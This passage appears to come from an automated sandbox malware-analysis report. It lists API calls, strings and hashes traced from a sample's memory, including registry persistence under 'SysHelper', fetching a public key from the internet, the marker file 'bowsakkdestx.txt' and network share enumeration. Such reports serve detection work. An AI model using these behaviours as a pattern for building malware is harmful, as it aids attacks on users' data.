                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                        • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                        • API String ID: 1783060780-3771355929
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Similarity
                                                                                                        • API ID: _strncmp
                                                                                                        • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                        • API String ID: 909875538-2908105608
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 00F1C6C2
                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 00F1C6F3
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F1C700
                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 00F1C725
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F1C72E
                                                                                                        Similarity
                                                                                                        • API ID: CloseValue$OpenQuery
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                        • API String ID: 3962714758-1667468722
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F2E707
                                                                                                          • Part of subcall function 00F1C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1C51B
                                                                                                        • InternetOpenW.WININET ref: 00F2E743
                                                                                                        • _wcsstr.LIBCMT ref: 00F2E7AE
                                                                                                        • _memmove.LIBCMT ref: 00F2E838
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F2E90A
                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00F2E93D
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F2E954
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F2E96F
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2E98C
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2E9A3
                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00F2E9CD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F3
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E9F6
                                                                                                        • _strstr.LIBCMT ref: 00F2EA36
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EA59
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EA74
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EA82
                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00F2EA92
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EAA4
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EABA
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EAC8
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F2EAE3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EB5B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EB7C
                                                                                                        • _malloc.LIBCMT ref: 00F2EB86
                                                                                                        • _memset.LIBCMT ref: 00F2EB94
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00F2EBAE
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EBB6
                                                                                                        • _strstr.LIBCMT ref: 00F2EBDA
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EC00
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EC24
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EC32
                                                                                                        Similarity
                                                                                                        • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                        • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                        • API String ID: 2805819797-1771568745
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Similarity
                                                                                                        • API ID: DecodePointer_write_multi_char$_write_string$__aulldvrm__cftof_free_strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1678825546-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Similarity
                                                                                                        • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2964551433-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Similarity
                                                                                                        • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2964551433-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • ___unDName.LIBCMT ref: 00F4071B
                                                                                                        • _strlen.LIBCMT ref: 00F4072E
                                                                                                        • __lock.LIBCMT ref: 00F4074A
                                                                                                        • _malloc.LIBCMT ref: 00F4075C
                                                                                                        • _malloc.LIBCMT ref: 00F4076D
                                                                                                        • _free.LIBCMT ref: 00F407B6
                                                                                                          • Part of subcall function 00F342FD: IsProcessorFeaturePresent.KERNEL32(00000017,00F342D1,00F33B69,?,?,00F30CE9,00F3520D,?,00F342DE,00000000,00000000,00000000,00000000,00000000,00F3981C), ref: 00F342FF
                                                                                                        • _free.LIBCMT ref: 00F407AF
                                                                                                          • Part of subcall function 00F30BED: HeapFree.KERNEL32(00000000,00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C01
                                                                                                          • Part of subcall function 00F30BED: GetLastError.KERNEL32(00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3704956918-0
                                                                                                        • Opcode ID: 98d3defed0bd0daf62975b57a88ce1f5a2a874f815e00f3d8b9c07ca2d043047
                                                                                                        • Instruction ID: 04d286bd1ed934b76e19ac672022ffd359494ff6b53989295b15cfd008b067e1
                                                                                                        • Opcode Fuzzy Hash: 98d3defed0bd0daf62975b57a88ce1f5a2a874f815e00f3d8b9c07ca2d043047
                                                                                                        • Instruction Fuzzy Hash: 0921B8B1904705ABE711AB749C41B1ABBD4AF04770F148129FD189B282EF7CE840EB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM ref: 00F21B1E
                                                                                                        • timeGetTime.WINMM ref: 00F21B29
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21B4C
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F21B5C
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21B6A
                                                                                                        • Sleep.KERNEL32(00000064), ref: 00F21B72
                                                                                                        • timeGetTime.WINMM ref: 00F21B78
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 3697694649-0
                                                                                                        • Opcode ID: fead3ebd68f149dfb06b2d689331d05c50ba1831460f7f91dcf9e5f404e33a55
                                                                                                        • Instruction ID: db0b7afb62c0997a1d282909b7cb5e2869b32df70cd30b343d839163da3ca3cd
                                                                                                        • Opcode Fuzzy Hash: fead3ebd68f149dfb06b2d689331d05c50ba1831460f7f91dcf9e5f404e33a55
                                                                                                        • Instruction Fuzzy Hash: FB017132E41329AADB20ABB59C45FEDB778BB48B50F044066E700A7190E660A901DBE9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • __init_pointers.LIBCMT ref: 00F35141
                                                                                                          • Part of subcall function 00F37D6C: EncodePointer.KERNEL32(00000000,?,00F35146,00F33FFE,01017990,00000014), ref: 00F37D6F
                                                                                                          • Part of subcall function 00F37D6C: __initp_misc_winsig.LIBCMT ref: 00F37D8A
                                                                                                          • Part of subcall function 00F37D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F426B3
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F426C7
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F426DA
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F426ED
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F42700
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F42713
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F42726
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F42739
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F4274C
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F4275F
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F42772
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F42785
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F42798
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F427AB
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F427BE
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F427D1
                                                                                                        • __mtinitlocks.LIBCMT ref: 00F35146
                                                                                                        • __mtterm.LIBCMT ref: 00F3514F
                                                                                                          • Part of subcall function 00F351B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F35154,00F33FFE,01017990,00000014), ref: 00F38B62
                                                                                                          • Part of subcall function 00F351B7: _free.LIBCMT ref: 00F38B69
                                                                                                          • Part of subcall function 00F351B7: DeleteCriticalSection.KERNEL32(0101AC00,?,?,00F35154,00F33FFE,01017990,00000014), ref: 00F38B8B
                                                                                                        • __calloc_crt.LIBCMT ref: 00F35174
                                                                                                        • __initptd.LIBCMT ref: 00F35196
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F3519D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3567560977-0
                                                                                                        • Opcode ID: b4186c6fedaa2b3c0fef3554ba354e997b58c664b0879b02535a623dc11e98e2
                                                                                                        • Instruction ID: f679d2c69902e0ebd839cf369d566a671e782742f7fa2ab4ee7eef1b5a4114d0
                                                                                                        • Opcode Fuzzy Hash: b4186c6fedaa2b3c0fef3554ba354e997b58c664b0879b02535a623dc11e98e2
                                                                                                        • Instruction Fuzzy Hash: 40F0243394AB515DE23577B47D03B4A3AD0EF41B70F21062AF864C62D5FF2D94427190
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 00F3594A
                                                                                                          • Part of subcall function 00F38AF7: __mtinitlocknum.LIBCMT ref: 00F38B09
                                                                                                          • Part of subcall function 00F38AF7: __amsg_exit.LIBCMT ref: 00F38B15
                                                                                                          • Part of subcall function 00F38AF7: EnterCriticalSection.KERNEL32(00F33B69,?,00F350D7,0000000D), ref: 00F38B22
                                                                                                        • _free.LIBCMT ref: 00F35970
                                                                                                          • Part of subcall function 00F30BED: HeapFree.KERNEL32(00000000,00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C01
                                                                                                          • Part of subcall function 00F30BED: GetLastError.KERNEL32(00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C13
                                                                                                        • __lock.LIBCMT ref: 00F35989
                                                                                                        • ___removelocaleref.LIBCMT ref: 00F35998
                                                                                                        • ___freetlocinfo.LIBCMT ref: 00F359B1
                                                                                                        • _free.LIBCMT ref: 00F359C4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                        • String ID:
                                                                                                        • API String ID: 626533743-0
                                                                                                        • Opcode ID: 61c81fba5533def4a58d7e79c24558907c2ad7088d0103b60c2c88f05aeec970
                                                                                                        • Instruction ID: 477a2b5d2735083591fed8bbf1e196250d97797bf43d6fde0d42bfd627e9a0d6
                                                                                                        • Opcode Fuzzy Hash: 61c81fba5533def4a58d7e79c24558907c2ad7088d0103b60c2c88f05aeec970
                                                                                                        • Instruction Fuzzy Hash: B5016D32903B04E6DE35AB68EC46B1D73A06F80BB1F24424EF464961D4CF7C9981FA51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • ___from_strstr_to_strchr.LIBCMT ref: 00F607C3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ___from_strstr_to_strchr
                                                                                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                        • API String ID: 601868998-2416195885
                                                                                                        • Opcode ID: 5adce71ff8ecc54423e1c27851db7937a766f2b7ad4a70c4f3a9c49e4e2001a1
                                                                                                        • Instruction ID: c4ae6525ae7dea929a4baae36b1aac22e36582d8d8d85d8c624f68e8b99d0102
                                                                                                        • Opcode Fuzzy Hash: 5adce71ff8ecc54423e1c27851db7937a766f2b7ad4a70c4f3a9c49e4e2001a1
                                                                                                        • Instruction Fuzzy Hash: EF411971A043059BDB20EE25CC45BAFB3D9EF91354F00082EF585D3242EB79E9089BE2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • __getptd_noexit.LIBCMT ref: 00FD5D3D
                                                                                                          • Part of subcall function 00F3501F: GetLastError.KERNEL32(?,00F33B69,00F3520D,00F30CE9,?,?,00F33B69,?), ref: 00F35021
                                                                                                          • Part of subcall function 00F3501F: __calloc_crt.LIBCMT ref: 00F35042
                                                                                                          • Part of subcall function 00F3501F: __initptd.LIBCMT ref: 00F35064
                                                                                                          • Part of subcall function 00F3501F: GetCurrentThreadId.KERNEL32 ref: 00F3506B
                                                                                                          • Part of subcall function 00F3501F: SetLastError.KERNEL32(00000000,00F33B69,00F3520D,00F30CE9,?,?,00F33B69,?), ref: 00F35083
                                                                                                        • __calloc_crt.LIBCMT ref: 00FD5D60
                                                                                                        • __get_sys_err_msg.LIBCMT ref: 00FD5D7E
                                                                                                        • __get_sys_err_msg.LIBCMT ref: 00FD5DCD
                                                                                                        Strings
                                                                                                        • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00FD5D48, 00FD5D6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                        • API String ID: 3123740607-798102604
                                                                                                        • Opcode ID: c4d141bb78757c81f78797d0f4c2c1e70a2ea7709c3376dffcc4daf0699c9c48
                                                                                                        • Instruction ID: 5509a4d0d749bdbeb60be43ec40d249dbd92c32bcf3d602493f2d11b563c8c2b
                                                                                                        • Opcode Fuzzy Hash: c4d141bb78757c81f78797d0f4c2c1e70a2ea7709c3376dffcc4daf0699c9c48
                                                                                                        • Instruction Fuzzy Hash: 7F11C472909E156BEB222A659C05AAB739FEF00FB0F140427FE09A6341E625ED0072B0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _fprintf_memset
                                                                                                        • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                        • API String ID: 3021507156-3399676524
                                                                                                        • Opcode ID: f7f92e2a180aaa63e610ec8f0ef6ee51a350b5011f9ea8c0638311b9b2f68a9b
                                                                                                        • Instruction ID: 67463655a65df6f871ce74026ee85e6bad4e243baa3a39a9f88ec3e31b6b20a1
                                                                                                        • Opcode Fuzzy Hash: f7f92e2a180aaa63e610ec8f0ef6ee51a350b5011f9ea8c0638311b9b2f68a9b
                                                                                                        • Instruction Fuzzy Hash: AA215772B043157BE620A925AC02FBB7799EFC1BACF048414FA54A71C6D622ED0562B3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1C51B
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1C539
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 29327785-2616962270
                                                                                                        • Opcode ID: b58c232de9b3c6920899ffaec95b1b44c9c92ae0205e1dae3824fcc202232a73
                                                                                                        • Instruction ID: d0edd10374fbd2b04a3b07717554d99062ca34f37a3dafc09ee5408b7ee04a53
                                                                                                        • Opcode Fuzzy Hash: b58c232de9b3c6920899ffaec95b1b44c9c92ae0205e1dae3824fcc202232a73
                                                                                                        • Instruction Fuzzy Hash: C1110AB2A8122833ED30B1696C47FDB735D9B41731F0001A6FE0C97182E56A965561E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00F2BAAD
                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00F2BABE
                                                                                                        • UpdateWindow.USER32(00000000), ref: 00F2BAC5
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateShowUpdate
                                                                                                        • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                        • API String ID: 2944774295-3503800400
                                                                                                        • Opcode ID: 0c0d3cf59ca25efc9874f6298aa1b5203ff0e2fd775fe4b699eb1719762c54f0
                                                                                                        • Instruction ID: 656556434878a33a83f29fa8906d3c169d9c7d287aac0b043c1d02711a598f6a
                                                                                                        • Opcode Fuzzy Hash: 0c0d3cf59ca25efc9874f6298aa1b5203ff0e2fd775fe4b699eb1719762c54f0
                                                                                                        • Instruction Fuzzy Hash: E4E09A316C272576F2315B257C0AF963655B706F21F31405AFA407D2C486E96841DADC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00F20C12
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00F20C39
                                                                                                        • _memset.LIBCMT ref: 00F20C4C
                                                                                                        • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00F20C63
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 364255426-0
                                                                                                        • Opcode ID: f674be0016ee49b5ec87b15710f97528f1e139a139e3cc688861dbd3c06126c0
                                                                                                        • Instruction ID: 614b04ef304044e59196c1b4a91d81f28cf4621f544f7edd5039005957690a10
                                                                                                        • Opcode Fuzzy Hash: f674be0016ee49b5ec87b15710f97528f1e139a139e3cc688861dbd3c06126c0
                                                                                                        • Instruction Fuzzy Hash: 6C91D576A083418FD728DF68D891B6BB7E1FFC4714F14891DF48A87282EB74A940DB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
